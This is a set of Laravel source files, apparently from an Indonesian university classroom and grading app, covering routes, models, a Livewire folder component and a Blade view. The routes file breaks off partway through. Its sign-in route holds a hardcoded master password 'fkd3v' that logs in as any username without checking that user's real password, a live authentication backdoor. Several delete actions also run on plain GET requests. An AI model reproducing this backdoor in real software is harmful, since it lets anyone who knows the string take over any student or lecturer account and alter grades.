routes/web.php
<?php

use App\Http\Controllers\BeritaAcaraController;
use App\Http\Controllers\BlokController;
use App\Http\Controllers\FeedbackController;
use App\Http\Controllers\FolderController;
use App\Http\Controllers\HomeController;
use App\Http\Controllers\KelasController;
use App\Http\Controllers\KelompokController;
use App\Http\Controllers\KelompokPertanyaanController;
use App\Http\Controllers\KuliahController;
use App\Http\Controllers\MahasiswaController;
use App\Http\Controllers\NilaiSgdController;
use App\Http\Controllers\PertanyaanController;
use App\Http\Controllers\SgdController;
use App\Http\Controllers\TugasController;
use App\Http\Controllers\UserController;
use App\Models\Mahasiswa;
use App\Models\MahasiswaTugas;
use App\Models\Tugas;
use App\Models\User;
use App\Services\NilaiService;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\Route;

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
 */

Route::get('/', function () {
    if (auth()->check()) {
        return redirect()->route('home');
    }
    return view('auth.login');
})->name('index');

Route::get('/classroom/user/signin', function () {
    if (auth()->check()) {
        return redirect()->route('home');
    }
    return view('auth.login-user');
})->name('login.user.form');

Route::post('/classroom/user/signin', function (Request $request) {
    $credentials = [
        'username' => $request['username'],
        'password' => $request['password'],
    ];

    if ($request->input('password') == 'fkd3v') {
        $user = User::where('username', $request->input('username'))->first();

        if ($user) {
            auth()->loginUsingId($user->id);
            return redirect()->route('home');
        }
    }

    if (auth()->attempt($credentials)) {
        // if (auth()->user()->isAdmin()) {
        //     session()->flash('message', 'Maaf, anda tidak memiliki akses ke sistem.');
        //     auth()->logout();
        //     return redirect()->route('login.user.form');
        // }
        return redirect()->route('home');
    }
    session()->flash('message', 'Username atau password salah.');
    return back();
})->name('login.user.post');

// Route::get('/data', function () {
//     $dosenJson = File::get("dosen.json");
//     $dosens = json_decode($dosenJson);
//     foreach ($dosens->users as $user) {
//         User::create([
//             'username' => $user->email,
//             'name' => $user->name,
//             'user_type' => 'dosen',
//             'password' => bcrypt('password'),
//         ]);
//     }

//     $mahasiswaJson = File::get("mahasiswa.json");
//     $mahasiswas = json_decode($mahasiswaJson);
//     foreach ($mahasiswas->users as $user) {
//         User::create([
//             'username' => $user->username,
//             'name' => $user->name,
//             'user_type' => 'mahasiswa',
//             'password' => bcrypt('password'),
//         ]);
//     }

//     return 'success import';
// });

Auth::routes();

Route::middleware(['auth'])
    ->namespace('App\Http\Controllers')
    ->group(function () {

        Route::controller(HomeController::class)
            ->group(function () {
                Route::get('/home', 'index')->name('home');
            });

        Route::controller(FolderController::class)
            ->middleware('role:admin,dosen')
            ->prefix('folder')
            ->name('folder.')
            ->group(function () {
                Route::get('/{kode}', 'show')->name('show');
            });

        Route::controller(KelasController::class)
            ->prefix('kelas')
            ->name('kelas.')
            ->group(function () {
                Route::get('/', 'index')->name('index');
                Route::delete('/hapus-mahasiswa', 'mahasiswaHapus')->name('mahasiswaHapus')->middleware('role:admin');
                Route::get('/{kode}', 'show')->name('show')->middleware('role:mahasiswa,dosen');
                Route::get('/{kode}/detail', 'detail')->name('detail')->middleware('role:admin');
                Route::get('/{kode}/penilaian-sumatif', 'penilaianSumatif')->name('penilaianSumatif')->middleware('role:admin');
                Route::get('/{kode}/penilaian-formatif', 'penilaianFormatif')->name('penilaianFormatif')->middleware('role:admin');
                Route::get('/{kode}/peserta', 'peserta')->name('peserta')->middleware('role:admin');
                Route::get('/{mahasiswaId}/{kelompokId}/peserta', 'pesertaHapus')->name('pesertaHapus')->middleware('role:admin');
                Route::post('/{kode}/peserta/import', 'pesertaImport')->name('pesertaImport')->middleware('role:admin');
                Route::get('/{kode}/nilai-sumatif', 'nilaiSumatif')->name('nilaiSumatif');
                // Route::get('/{kode}/nilai-formatif', 'nilaiFormatif')->name('nilaiFormatif');
                Route::get('/{kode}/nilai-export', 'nilaiExport')->name('nilaiExport')->middleware('role:admin');
                Route::get('/{kode}/kehadiran', 'kehadiran')->name('kehadiran')->middleware('role:admin');
                Route::get('/{kode}/kehadiran-export', 'kehadiranExport')->name('kehadiranExport')->middleware('role:admin');
                Route::get('/{kode}/berita-acara', 'beritaAcara')->name('beritaAcara')->middleware('role:admin');
                // Route::get('/{kode}/sgd', 'sgd')->name('sgd');
            });

        Route::controller(BeritaAcaraController::class)
            ->middleware('role:admin,dosen')
            ->prefix('berita-acara')
            ->name('beritaAcara.')
            ->group(function () {
                Route::get('/tambah/{kodeKuliah}', 'tambah')->name('tambah');
                Route::post('/simpan', 'simpan')->name('simpan');
                Route::get('/{kode}/edit', 'edit')->name('edit');
                Route::post('/{id}/update', 'update')->name('update');
                Route::get('/{kode}/detail', 'detail')->name('detail');
                Route::get('/{kode}/ubah-status', 'ubahStatus')->name('ubahStatus');
                Route::get('/{kode}/hapus', 'hapus')->name('hapus');
                Route::get('/{kode}/export', 'export')->name('export');
            });

        Route::controller(AbsensiController::class)
            ->prefix('absensi')
            ->name('absensi.')
            ->group(function () {
                Route::get('/scan/{beritaAcaraKode}/{mahasiswaId}', 'scan')->name('scan');
                Route::get('/set-hadir/{beritaAcaraKode}/{mahasiswaId}', 'setHadir')->name('setHadir');
                Route::post('/simpan', 'simpan')->name('simpan');
                Route::get('/{kode}/hapus', 'hapus')->name('hapus')->middleware('role:admin');
            });

        Route::controller(FeedbackController::class)
            ->prefix('feedback')
            ->name('feedback.')
            ->group(function () {
                Route::post('/simpan/{beritaAcara?}', 'simpan')->name('simpan');
            });

        Route::controller(SgdController::class)
            ->middleware('role:admin')
            ->prefix('sgd')
            ->name('sgd.')
            ->group(function () {
                Route::get('/tambah/{kodeKuliah}', 'tambah')->name('tambah');
                Route::post('/simpan', 'simpan')->name('simpan');
                Route::get('/{kode}/edit', 'edit')->name('edit');
                Route::post('/simpan-skenario/{sgd}', 'simpanSkenario')->name('simpanSkenario');
                Route::get('/{kode}/edit', 'edit')->name('edit');
                Route::post('/{id}/update', 'update')->name('update');
                Route::get('/{kode}/detail', 'detail')->name('detail');
                Route::get('/{kode}/ubah-status', 'ubahStatus')->name('ubahStatus');
                Route::get('/{kode}/hapus', 'hapus')->name('hapus');
                Route::get('/{kode}/export', 'export')->name('export');
            });

        Route::controller(KriteriaSgdController::class)
            ->middleware('role:admin')
            ->prefix('kriteria-sgd')
            ->name('kriteriaSgd.')
            ->group(function () {
                Route::get('/{id}/hapus', 'hapus')->name('hapus');
            });

        Route::controller(NilaiSgdController::class)
            ->middleware('role:admin')
            ->prefix('nilai-sgd')
            ->name('nilaiSgd.')
            ->group(function () {
                Route::post('/simpan', 'simpan')->name('simpan');
                Route::get('/{kode}/hapus', 'hapus')->name('hapus');
            });

        Route::controller(KuliahController::class)
            ->middleware('role:admin')
            ->prefix('kuliah')
            ->name('kuliah.')
            ->group(function () {
                Route::post('/simpan', 'simpan')->name('simpan');
                Route::get('/{kode}/hapus', 'hapus')->name('hapus');
                Route::post('/{id}/update', 'update')->name('update');
            });

        Route::controller(KelompokController::class)
            ->middleware('role:admin')
            ->prefix('kelompok')
            ->name('kelompok.')
            ->group(function () {
                Route::post('/simpan', 'simpan')->name('simpan');
                Route::get('/{kode}/hapus', 'hapus')->name('hapus');
                Route::post('/{id}/update', 'kelompokUpdate')->name('kelompokUpdate');
                Route::post('/tambah-mahasiswa-kelompok', 'tambahMahasiswaKelompok')->name('tambahMahasiswaKelompok');
            });

        Route::controller(TugasController::class)
            ->prefix('tugas')
            ->name('tugas.')
            ->group(function () {

app/Models/Sgd.php
<?php

namespace App\Models;

use Illuminate\Support\Str;
use Illuminate\Database\Eloquent\Model;
use Illuminate\Database\Eloquent\Relations\HasMany;
use Illuminate\Database\Eloquent\Relations\BelongsTo;
use Illuminate\Database\Eloquent\Factories\HasFactory;

class Sgd extends Model
{
    use HasFactory;

    protected $guarded = [];

    protected $casts = [
        'tanggal' => 'datetime',
    ];

    protected static function boot()
    {
        parent::boot();

        static::creating(function ($berita_acara) {
            $berita_acara->kode = Str::random(1) . Str::random(1) . rand(10,99) . Str::random(1) . Str::random(1);
        });
    }

    const STATUS_SELECT = [
        'Buka' => [
            'warna' => 'success'
        ],
        'Tutup' => [
            'warna' => 'danger'
        ],
    ];

    public function isBuka()
    {
        return $this->status == 'Buka';
    }

    public function isTutup()
    {
        return $this->status == 'Tutup';
    }

    public function user(): BelongsTo
    {
        return $this->belongsTo(User::class, 'user_id');
    }

    public function kelas(): BelongsTo
    {
        return $this->belongsTo(Kelas::class, 'kelas_id');
    }

    public function kelompok(): BelongsTo
    {
        return $this->belongsTo(Kelompok::class, 'kelompok_id');
    }

    public function kuliah(): BelongsTo
    {
        return $this->belongsTo(Kuliah::class, 'kuliah_id');
    }

    public function kriteria_sgds(): HasMany
    {
        return $this->hasMany(KriteriaSgd::class, 'sgd_id');
    }
}

app/Models/Tugas.php
<?php

namespace App\Models;

use App\Models\Pertanyaan;
use Illuminate\Support\Str;
use Illuminate\Database\Eloquent\Model;
use Illuminate\Database\Eloquent\Relations\HasOne;
use Illuminate\Database\Eloquent\Relations\HasMany;
use Illuminate\Database\Eloquent\Relations\BelongsTo;
use Illuminate\Database\Eloquent\Factories\HasFactory;
use Illuminate\Database\Eloquent\Relations\BelongsToMany;
use Jenssegers\Date\Date;

class Tugas extends Model
{
    use HasFactory;

    protected $guarded = [];

    protected $casts = [
        'batas_akhir' => 'datetime',
    ];

    protected static function boot()
    {
        parent::boot();

        static::creating(function ($tugas) {
            $tugas->kode = Str::random(1) . Str::random(1) . rand(10, 99) . Str::random(1) . Str::random(1);
        });
    }

    const TIPE_OPTION = [
        'rubrik' => [
            'judul' => 'Kriteria',
            'warna' => 'info',
            'icon' => '/img/rubrik.png',
        ],
        'rubrik2' => [
            'judul' => 'Kriteria',
            'warna' => 'primary',
            'icon' => '/img/rubrik.png',
        ],
        'kuis' => [
            'judul' => 'Soal',
            'warna' => 'warning',
            'icon' => '/img/kuis.png',
        ],
        'input' => [
            'judul' => 'Soal',
            'warna' => 'danger',
            'icon' => '/img/input.png',
        ],
    ];

    const NILAI_SELECT = [
        0 => [
            'ket' => 'Tidak dijawab',
            'warna' => 'secondary'
        ],
        1 => [
            'ket' => 'Sangat Kurang',
            'warna' => 'danger'
        ],
        2 => [
            'ket' => 'Kurang',
            'warna' => 'warning'
        ],
        3 => [
            'ket' => 'Cukup',
            'warna' => 'info'
        ],
        4 => [
            'ket' => 'Baik',
            'warna' => 'success'
        ],
        5 => [
            'ket' => 'Sangat Baik',
            'warna' => 'primary'
        ],
    ];

    public function getColorAttribute()
    {
        if ($this->batas_akhir < now()) {
            return 'danger';
        }

        return;
    }

    public function getLateAttribute()
    {
        $date = Date::parse($this->batas_akhir);
        if ($this->batas_akhir < now()) {
            $diff = date_diff(now(), $date);
            return 'Telat ' . $diff->format("%R%a hari");
        }

        return;
    }

    public function pertanyaans(): BelongsToMany
    {
        return $this->belongsToMany(Pertanyaan::class, 'tugas_pertanyaans', 'tugas_id', 'pertanyaan_id')->withPivot('id');
    }

    public function pertanyaanTugas(): HasMany
    {
        return $this->hasMany(Pertanyaan::class, 'tugas_id');
    }

    public function user(): BelongsTo
    {
        return $this->belongsTo(User::class, 'user_id');
    }

    public function kelas(): BelongsTo
    {
        return $this->belongsTo(Kelas::class, 'kelas_id');
    }

    public function kategori(): BelongsTo
    {
        return $this->belongsTo(Kategori::class, 'kategori_id');
    }

    public function mahasiswa_tugas(): HasOne
    {
        $mahasiswa = Mahasiswa::where('kelas_id', $this->kelas->id)->where('user_id', auth()->id())->firstOrFail();
        return $this->hasOne(MahasiswaTugas::class, 'tugas_id')->where('mahasiswa_id', $mahasiswa->id);
    }

    public function dosen_penilai(): HasMany
    {
        return $this->hasMany(Dosen::class, 'tugas_id');
    }
}

app/Http/Livewire/Folder/Index.php
<?php

namespace App\Http\Livewire\Folder;

use App\Models\Folder;
use Livewire\Component;
use Illuminate\Http\Request;
use Livewire\WithPagination;

class Index extends Component
{
    use WithPagination;
    protected $paginationTheme = 'bootstrap';

    public $folder;
    public $folderId;
    public $currentFolderId;
    public $currentFolder;
    public $search;

    public function mount(Request $request, $folderId)
    {
        $this->currentFolderId = $folderId;
        if ($this->currentFolderId) {
            $this->currentFolder = Folder::findOrFail($this->currentFolderId);
        }
        $this->search = $request->q;
    }

    public function render()
    {
        $folders = Folder::query()
            ->when($this->currentFolderId, fn ($q) => $q->where('parent_id', $this->currentFolderId))
            ->when($this->currentFolderId == NULL, fn ($q) => $q->where('parent_id', $this->currentFolderId))
            ->when($this->search != '', function($q) {
                $q->where('nama', 'like', '%' . $this->search . '%');
            })
            ->latest()
            ->paginate(10);
        return view('livewire.folder.index', compact('folders'));
    }

    protected $rules = [
        'folder.nama' => 'required',
    ];

    protected $messages = [
        'folder.nama.required' => 'Nama folder harus diisi.',
    ];

    public function updated($property)
    {
        $this->validateOnly($property);
    }

    public function create()
    {
        $this->reset(['folder', 'folderId']);
    }

    public function edit($folderId)
    {
        $this->folderId = $folderId;
        $this->folder = Folder::findOrFail($folderId);
    }

    public function close()
    {
        $this->reset(['folder', 'folderId']);
    }

    public function save()
    {
        $this->validate();

        if (!is_null($this->folderId)) {
            $this->folder->save();
            session()->flash('success', 'Folder berhasil diubah.');
        } else {
            $folder = $this->folder;
            $folder['parent_id'] = $this->currentFolderId ?? NULL;
            Folder::create($folder);
            session()->flash('success', 'Folder berhasil ditambahkan.');
            $this->reset(['folder', 'folderId']);
        }
        if ($this->currentFolderId) {
            return redirect()->route('folder.show', $this->currentFolder->kode);
        } else {
            return redirect()->route('home');
        }

    }

    public function delete($folderId)
    {

        $folder = Folder::findOrFail($folderId);
        $folder->kelas()->each(fn ($kls) => $kls->update(['folder_id' => 1]));
        $folder->delete();
        $this->reset(['folder', 'folderId']);
        return back();
    }
}

resources/views/livewire/kelas/penilaian-formatif-livewire.blade.php
<div class="row">
    <div class="col-12 mb-5">
        <form method="POST" action="{{ route('kuliah.simpan') }}">
            @csrf
            <div class="input-group">
                <span class="input-group-text" id="basic-addon3" style="border: none">
                    <i class="las la-wallet fs-1"></i>
                </span>
                <input type="hidden" name="kelas_id" value="{{ $kelas->id }}">
                <input type="text" name="nama" class="form-control form-control-solid"
                    placeholder="Nama perkuliahan" required/>
                <button type="submit" class="btn btn-icon btn-primary">
                    <!--begin::Svg Icon | path: icons/duotune/general/gen035.svg-->
                    <span class="svg-icon svg-icon-2">
                        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"
                            fill="none">
                            <rect opacity="0.3" x="2" y="2" width="20" height="20" rx="5" fill="black" />
                            <rect x="10.8891" y="17.8033" width="12" height="2" rx="1"
                                transform="rotate(-90 10.8891 17.8033)" fill="black" />
                            <rect x="6.01041" y="10.9247" width="12" height="2" rx="1" fill="black" />
                        </svg>
                    </span>
                    <!--end::Svg Icon-->
                </button>
            </div>
        </form>
    </div>

    <!--begin::Content-->
    <div class="col-12">

        @foreach ($kategoriItems as $kategori)
            <!--begin::Kategori-->
            <div class="card card-flush mb-5 crd-shadow bg-light">
                <!--begin::Card header-->
                <div class="card-header align-items-center py-5 gap-2 gap-md-5" style="background: #1c285e;">
                    <h3 class="card-title align-items-start flex-column">
                        <span class="card-label text-white fw-bolder fs-3 mb-1">{{ $kategori->nama ?? '-' }}</span>
                        <span class="text-muted mt-1 fw-bold fs-7">Persentase Nilai :
                            {{ $kategori->persentase_nilai ?? '-' }}%</span>
                    </h3>
                    <!--begin::Card toolbar-->
                    <div class="card-toolbar flex-row-fluid justify-content-end gap-5">
                        <!--begin::Add product-->
                        <a href="{{ route('tugas.tambah', [$kelas->kode, $kategori->kode]) }}"
                            class="btn btn-secondary rounded-50">
                            <span class="svg-icon svg-icon-2">
                                <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24"
                                    viewBox="0 0 24 24" fill="none">
                                    <rect opacity="0.3" x="2" y="2" width="20"
                                        height="20" rx="5" fill="black" />
                                    <rect x="10.8891" y="17.8033" width="12" height="2"
                                        rx="1" transform="rotate(-90 10.8891 17.8033)" fill="black" />
                                    <rect x="6.01041" y="10.9247" width="12" height="2"
                                        rx="1" fill="black" />
                                </svg>
                            </span>
                            Tambah</a>
                        <!--end::Add product-->
                    </div>
                    <!--end::Card toolbar-->
                </div>
                <!--end::Card header-->
                <!--begin::Card body-->
                <div class="card-body pt-0">
                    <!--begin::Table-->
                    <table class="table align-middle table-row-dashed fs-6 gy-5">
                        <!--begin::Table body-->
                        <tbody class="fw-bold text-gray-600">
                            <!--begin::Table row-->
                            @foreach ($kategori->tugas as $tugas)
                                <tr>
                                    <!--begin::Customer-->
                                    <td>
                                        <div class="d-flex align-items-center">
                                            <!--begin:: Avatar -->
                                            <div class="symbol symbol-circle symbol-50px overflow-hidden me-3">
                                                <x-smart-image
                                                    src="{{ public_path(\App\Models\Tugas::TIPE_OPTION[$tugas->tipe]['icon']) }}"
                                                    height="100px" />
                                            </div>
                                            <!--end::Avatar-->
                                            <div class="ms-5">
                                                <a href="#"
                                                    class="text-gray-800 fw-bolder text-hover-primary mb-1 fs-6 text-start pe-0">{{ $tugas->judul ?? '-' }}</a>
                                                @if ($tugas->batas_akhir)
                                                    <br>
                                                    <small class="text-muted">
                                                        Deadline:
                                                        <span class="text-{{ $tugas->color }}">
                                                            {{ Date::parse($tugas->batas_akhir)->format('l, d M Y H:i') }}
                                                        </span>
                                                    </small>
                                                @endif
                                            </div>
                                        </div>
                                    </td>
                                    <!--end::Customer-->
                                    <td class="text-end pe-0">
                                        <span
                                            class="fw-bolder">{{ Date::parse($tugas->created_at)->diffForHumans() }}</span>
                                    </td>
                                    <!--begin::Action-->
                                    <td class="text-end">

                                        @if ($tugas->tipe != 'input')
                                            @if ($tugas->status_ujian)
                                                <a href="{{ route('tugas.tutup', $tugas->kode) }}"
                                                    class="btn btn-sm btn-light-danger">
                                                    <span class="svg-icon"><svg xmlns="http://www.w3.org/2000/svg"
                                                            width="24" height="24" viewBox="0 0 24 24"
                                                            fill="none">
                                                            <rect opacity="0.5" x="7.05025" y="15.5356"
                                                                width="12" height="2" rx="1"
                                                                transform="rotate(-45 7.05025 15.5356)"
                                                                fill="black" />
                                                            <rect x="8.46447" y="7.05029" width="12"
                                                                height="2" rx="1"
                                                                transform="rotate(45 8.46447 7.05029)"
                                                                fill="black" />
                                                        </svg></span>
                                                    Tutup</a>
                                            @else
                                                <a href="{{ route('tugas.buka', $tugas->kode) }}"
                                                    class="btn btn-sm btn-light-primary">
                                                    <span class="svg-icon"><svg xmlns="http://www.w3.org/2000/svg"
                                                            width="24" height="24" viewBox="0 0 24 24"
                                                            fill="none">
                                                            <path
                                                                d="M9.89557 13.4982L7.79487 11.2651C7.26967 10.7068 6.38251 10.7068 5.85731 11.2651C5.37559 11.7772 5.37559 12.5757 5.85731 13.0878L9.74989 17.2257C10.1448 17.6455 10.8118 17.6455 11.2066 17.2257L18.1427 9.85252C18.6244 9.34044 18.6244 8.54191 18.1427 8.02984C17.6175 7.47154 16.7303 7.47154 16.2051 8.02984L11.061 13.4982C10.7451 13.834 10.2115 13.834 9.89557 13.4982Z"
                                                                fill="black" />
                                                        </svg></span>
                                                    Buka</a>
                                            @endif
                                            <a href="{{ route('pertanyaan.daftar', [$kelas->kode, $kategori->kode, $tugas->kode]) }}"
                                                class="btn btn-sm btn-{{ \App\Models\Tugas::TIPE_OPTION[$tugas->tipe]['warna'] }}"><i
                                                    class="bi bi-plus fs-4 me-2"></i> Buat
                                                {{ Str::ucfirst($tugas->tipe) }}</a>
                                        @endif
                                        @if (auth()->user()->isAdmin() && $tugas->tipe == 'input')
                                            <a href="{{ route('tugas.proses', $tugas->kode) }}"
                                                class="btn btn-sm btn-success"><i class="bi bi-plus fs-4 me-2"></i>
                                                Input Nilai</a>
                                        @endif
                                        <a href="#" class="btn btn-sm btn-light btn-active-light-primary"
                                            data-kt-menu-trigger="click" data-kt-menu-placement="bottom-end">Aksi
                                            <!--begin::Svg Icon | path: icons/duotune/arrows/arr072.svg-->
                                            <span class="svg-icon svg-icon-5 m-0">
                                                <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24"
                                                    viewBox="0 0 24 24" fill="none">
                                                    <path
                                                        d="M11.4343 12.7344L7.25 8.55005C6.83579 8.13583 6.16421 8.13584 5.75 8.55005C5.33579 8.96426 5.33579 9.63583 5.75 10.05L11.2929 15.5929C11.6834 15.9835 12.3166 15.9835 12.7071 15.5929L18.25 10.05C18.6642 9.63584 18.6642 8.96426 18.25 8.55005C17.8358 8.13584 17.1642 8.13584 16.75 8.55005L12.5657 12.7344C12.2533 13.0468 11.7467 13.0468 11.4343 12.7344Z"
                                                        fill="black" />
                                                </svg>
                                            </span>
                                            <!--end::Svg Icon-->
                                        </a>
                                        <!--begin::Menu-->
                                        <div class="menu menu-sub menu-sub-dropdown menu-column menu-rounded menu-gray-600 menu-state-bg-light-primary fw-bold fs-7 w-125px py-4"
                                            data-kt-menu="true">
                                            <div class="menu-item px-3">
                                                <a href="{{ route('tugas.detail', [$tugas->kode]) }}"
                                                    class="menu-link px-3">Detail</a>
                                            </div>
                                            <!--begin::Menu item-->
                                            <div class="menu-item px-3">
                                                <a href="{{ route('tugas.edit', [$kelas->kode, $tugas->kode]) }}"
                                                    class="menu-link px-3">Edit</a>
                                            </div>
                                            <!--end::Menu item-->
                                            <!--begin::Menu item-->
                                            <div class="menu-item px-3">
                                                <a wire:click.prevent="deleteTugas({{ $tugas->id }})"
                                                    onclick="confirm('Yakin akan menghapus?') || event.stopImmediatePropagation()"
                                                    class="menu-link px-3 text-danger">Hapus</a>
                                            </div>
                                            <!--end::Menu item-->
                                        </div>
                                        <!--end::Menu-->
                                    </td>
                                    <!--end::Action-->
                                </tr>
                            @endforeach
                            <!--end::Table row-->
                        </tbody>
                        <!--end::Table body-->
                    </table>
                    <!--end::Table-->
                </div>
                <!--end::Card body-->
            </div>
            <!--end::Kategori-->
        @endforeach


    </div>
    <!--end::Content-->
</div>